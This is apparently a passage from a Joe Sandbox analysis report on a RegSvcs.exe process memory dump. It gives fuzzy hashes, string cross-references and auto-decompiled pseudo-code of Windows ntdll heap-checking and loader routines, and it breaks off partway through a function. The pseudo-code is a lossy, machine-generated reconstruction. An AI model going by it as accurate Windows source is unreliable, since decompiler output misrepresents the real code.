Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: aec826de26084a3fc3a84c64fcccd24d1a27e4e44bda77219b3c666725d87bc8
Instruction ID: b2456e1c219e9c7495682b70ddcd86dd057a4c8316190fb4d9e22dcf4b0c345b
Opcode Fuzzy Hash: aec826de26084a3fc3a84c64fcccd24d1a27e4e44bda77219b3c666725d87bc8
Instruction Fuzzy Hash: CB5106322056859FE312EB68C848F677BE8FFC1B54F080469F569DB2A1D775DA00C762

Uniqueness

Uniqueness Score: -1.00%

Function 019849A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01984A4A, 01984A5D, 01984A5F, 01984AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01984A61
HEAP[%wZ]: , xrefs: 01984A3D, 01984AB7
This is located in the %s field of the heap header., xrefs: 01984AD6

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 43e86a9d0845a199fda58f7dec37795608b772f3a5d800be1e824786c221559b
Instruction ID: 01d75c4ef2e9328b98131fd665b85db21ab207d2a7d32c165da95b05722bcc28
Opcode Fuzzy Hash: 43e86a9d0845a199fda58f7dec37795608b772f3a5d800be1e824786c221559b
Instruction Fuzzy Hash: 33312831200502EFE721EB9DC889F67B7ACEF04B61F14446AF50ACF251E674EA44C759

Uniqueness

Uniqueness Score: -1.00%

Function 018E99BF Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E018E99BF(void* __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				void* _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0197FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0198A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0191D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E018CB150();
										} else {
											E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E018CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x19b6378 = 1;
											asm("int3");
											 *0x19b6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E018EA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								L018EA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E018EBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0198A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E018EA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								L018EA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0191D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E018CB150();
								} else {
									E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E018CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x19b6378 = 1;
									asm("int3");
									 *0x19b6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0197FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0198A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0191D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E018CB150();
													} else {
														E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E018CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x19b6378 = 1;
														asm("int3");
														 *0x19b6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E018EA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										L018EA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E018EBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0198A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0191D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E018CB150();
													} else {
														E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E018CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x19b6378 = 1;
														asm("int3");
														 *0x19b6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E018EA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										L018EA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E018EBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E018EBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x018e99ca
0x018e99cc
0x018e99df
0x018e99e3
0x018e99f8
0x018e99fb
0x018e99fb
0x00000000
0x018e9a48
0x018e9a48
0x018e9a4c
0x018e9a51
0x018e9a55
0x018e9a61
0x018e9a66
0x018e9a68
0x01931457
0x0193145c
0x0193145c
0x018e9a68
0x018e9a6e
0x018e9a71
0x018e9a74
0x018e9a76
0x01931466
0x01931469
0x01931469
0x0193146c
0x0193146e
0x01931471
0x01931474
0x01931477
0x01931479
0x0193159c
0x0193159c
0x0193159d
0x019315a6
0x019315ab
0x019315ab
0x00000000
0x019315ab
0x0193147f
0x01931481
0x00000000
0x00000000
0x0193148a
0x0193148d
0x01931493
0x01931495
0x019314c0
0x019314c0
0x019314c3
0x019314c6
0x019314c8
0x019314cb
0x019314cf
0x019314f2
0x019314f2
0x019314f5
0x019314f8
0x01931501
0x01931508
0x0193150b
0x0193150e
0x01931510
0x01931513
0x01931515
0x01931515
0x01931518
0x01931518
0x01931513
0x01931521
0x01931525
0x0193152a
0x0193152d
0x01931530
0x01931532
0x01931539
0x0193153d
0x0193155d
0x01931562
0x0193153f
0x01931555
0x0193155a
0x01931570
0x01931577
0x0193157c
0x01931582
0x01931585
0x01931589
0x0193158b
0x01931592
0x01931593
0x01931593
0x01931589
0x01931530
0x00000000
0x019314f8
0x019314d5
0x019314da
0x019314dc
0x00000000
0x019314de
0x019314e8
0x00000000
0x019314e8
0x01931497
0x01931497
0x019314a4
0x019314a4
0x019314a7
0x019314a9
0x019314ab
0x019314ab
0x0193149c
0x0193149e
0x019314a0
0x019314b0
0x019314b0
0x00000000
0x019314a2
0x019314a2
0x00000000
0x019314a2
0x019314a0
0x019314b3
0x019314bb
0x00000000
0x019314bb
0x01931495
0x018e9a7c
0x018e9a7c
0x018e9a7f
0x018e9a7f
0x018e9a82
0x018e9a84
0x018e9a87
0x018e9a8a
0x018e9a8d
0x018e9a8f
0x0193166a
0x0193166a
0x0193166b
0x01931674
0x00000000
0x01931674
0x018e9a95
0x018e9a97
0x00000000
0x00000000
0x018e9aa0
0x018e9aa3
0x018e9aa9
0x018e9aab
0x018e9ad7
0x018e9ad7
0x018e9ada
0x018e9add
0x018e9adf
0x018e9ae2
0x018e9ae6
0x018e9b22
0x018e9b27
0x018e9b29
0x00000000
0x018e9b2b
0x019315be
0x00000000
0x019315be
0x018e9b29
0x018e9ae8
0x018e9ae8
0x018e9aeb
0x018e9aee
0x019315cb
0x019315d2
0x019315d5
0x019315d7
0x019315da
0x019315dc
0x019315dc
0x019315dc
0x019315da
0x019315e5
0x019315e9
0x019315ee
0x019315f1
0x019315f3
0x019315f9
0x01931600
0x01931604
0x01931624
0x01931629
0x01931606
0x0193161c
0x01931621
0x01931637
0x0193163e
0x01931643
0x01931649
0x0193164c
0x01931650
0x01931656
0x0193165d
0x0193165e
0x0193165e
0x01931650
0x019315f3
0x018e9af4
0x018e9af7
0x018e9afc
0x018e9b00
0x018e9b04
0x018e9b08
0x018e9b14
0x018e99fe
0x018e9a04
0x018e9a07
0x00000000
0x018e9a29
0x0193169c
0x019316a0
0x019316a5
0x019316a9
0x019316b5
0x019316ba
0x019316bc
0x019316be
0x019316c3
0x019316c3
0x019316bc
0x019316c8
0x019316cc
0x0193181b
0x0193181b
0x0193181e
0x0193181e
0x01931821
0x01931823
0x01931826
0x01931829
0x0193182c
0x0193182e
0x01931688
0x01931688
0x01931689
0x0193168b
0x0193168c
0x0193168d
0x0193168f
0x01931692
0x00000000
0x01931692
0x01931834
0x01931836
0x00000000
0x00000000
0x0193183f
0x01931842
0x01931848
0x0193184a
0x01931875
0x01931875
0x01931878
0x0193187b
0x0193187d
0x01931880
0x01931884
0x019318a7
0x019318a7
0x019318aa
0x019318ad
0x019318b6
0x019318bd
0x019318c0
0x019318c3
0x019318c5
0x019318c8
0x019318ca
0x019318ca
0x019318cd
0x019318cd
0x019318c8
0x019318d5
0x019318da
0x019318df
0x019318e2
0x019318e5
0x019318e7
0x019318ee
0x019318f2
0x01931912
0x01931917
0x019318f4
0x0193190a
0x0193190f
0x01931925
0x0193192c
0x01931931
0x0193193a
0x0193193e
0x01931940
0x01931947
0x01931948
0x01931948
0x0193193e
0x019318e5
0x0193194f
0x01931952
0x01931956
0x0193195d
0x01931961
0x0193196d
0x00000000
0x0193196d
0x0193188a
0x0193188f
0x01931891
0x00000000
0x00000000
0x0193189d
0x00000000
0x0193189d
0x0193184c
0x01931859
0x01931859
0x0193185c
0x00000000
0x00000000
0x01931851
0x01931853
0x01931855
0x01931865
0x01931865
0x01931866
0x01931868
0x01931870
0x00000000
0x01931870
0x01931857
0x01931857
0x0193185e
0x00000000
0x019316d2
0x019316d2
0x019316d5
0x019316d5
0x019316d8
0x019316da
0x019316dd
0x019316e0
0x019316e3
0x019316e5
0x01931808
0x01931808
0x01931809
0x01931812
0x01931817
0x01931817
0x00000000
0x01931817
0x019316eb
0x019316ed
0x00000000
0x00000000
0x019316f6
0x019316f9
0x019316ff
0x01931701
0x0193172c
0x0193172c
0x0193172f
0x01931732
0x01931734
0x01931737
0x0193173b
0x0193175e
0x0193175e
0x01931761
0x01931764
0x0193176d
0x01931774
0x01931777
0x0193177a
0x0193177c
0x0193177f
0x01931781
0x01931781
0x01931784
0x01931784
0x0193177f
0x0193178c
0x01931791
0x01931796
0x01931799
0x0193179c
0x0193179e
0x019317a5
0x019317a9
0x019317c9
0x019317ce
0x019317ab
0x019317c1
0x019317c6
0x019317dc
0x019317e3
0x019317e8
0x019317ee
0x019317f1
0x019317f5
0x019317f7
0x019317fe
0x019317ff
0x019317ff
0x019317f5
0x0193179c
0x00000000
0x01931764
0x01931741
0x01931746
0x01931748
0x00000000
0x00000000
0x01931754
0x00000000
0x01931754
0x01931703
0x01931710
0x01931710
0x01931713
0x00000000
0x00000000
0x01931708
0x0193170a
0x0193170c
0x0193171c
0x0193171c
0x0193171d
0x0193171f
0x01931727
0x00000000
0x01931727
0x0193170e
0x0193170e
0x01931715
0x00000000
0x01931715
0x019316cc
0x018e9a45
0x018e9a45
0x018e9a0e
0x018e9a1c
0x018e9a23
0x0193167e
0x0193167f
0x01931681
0x01931683
0x01931684
0x00000000
0x01931684
0x00000000
0x018e9aad
0x018e9aad
0x018e9ab0
0x018e9ab3
0x018e9ab3
0x018e9ab6
0x00000000
0x00000000
0x018e9ab8
0x018e9aba
0x018e9abc
0x018e9ac8
0x018e9ac8
0x00000000
0x018e9abe
0x018e9abe
0x018e9ac0
0x00000000
0x018e9ac0
0x018e9abc
0x018e9ad2
0x00000000
0x018e9ad2
0x018e9aab

Strings

HEAP: , xrefs: 0193155D, 01931624, 019317C9, 01931912
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01931572, 01931639, 019317DE, 01931927
HEAP[%wZ]: , xrefs: 01931550, 01931617, 019317BC, 01931905

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 0d7966c774d8bf30a48c99dc60586ac622f8a42324c90a16bd9dd93c6cbb193c
Instruction ID: 8198c32b9df9fba1e4df902e95268a95bae210cecf19398b22dc194cee1e7d9e
Opcode Fuzzy Hash: 0d7966c774d8bf30a48c99dc60586ac622f8a42324c90a16bd9dd93c6cbb193c
Instruction Fuzzy Hash: 4F220270A002469FEB25CF2CC484B7ABBF9EF85704F188569E44ACB396E774D981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 018D8794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E018D8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E018D934A() != 0) {
								_t159 = E0194A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x19b5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01945510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x19b5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E018D849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
